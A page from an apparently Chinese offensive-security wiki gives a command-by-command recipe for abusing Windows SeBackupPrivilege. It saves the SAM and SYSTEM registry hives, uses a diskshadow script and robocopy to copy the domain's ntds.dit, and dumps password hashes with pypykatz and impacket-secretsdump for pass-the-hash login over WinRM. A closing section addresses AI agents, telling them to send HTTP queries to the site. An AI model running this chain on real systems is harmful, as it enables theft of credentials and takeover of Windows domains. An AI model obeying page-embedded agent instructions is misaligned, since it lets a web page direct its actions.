# SeBackupPrivilege

```
>whoami /priv 可以看到SeBackupPrivilege状态是Enabled
可以导出SYSTEM文件破解密码
>reg save hklm\sam c:\Temp\sam
>reg save hklm\system c:\Temp\system
>pypykatz registry --sam sam system
域环境下
>whoami /priv 可以看到SeBackupPrivilege和SeRestorePrivilege状态是Enabled
攻击机kali新建文件raj.dsh，内容为
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
执行命令
unix2dos raj.dsh
传至靶机执行
>diskshadow /s raj.dsh
>robocopy /b z:\windows\ntds . ntds.dit
>reg save hklm\system c:\Temp\system
kali中执行
>impacket-secretsdump -ntds ntds.dit -system system local
可使用winrm哈希方式登录
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/quan-xian-ti-sheng/windows-ti-quan/sebackupprivilege.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.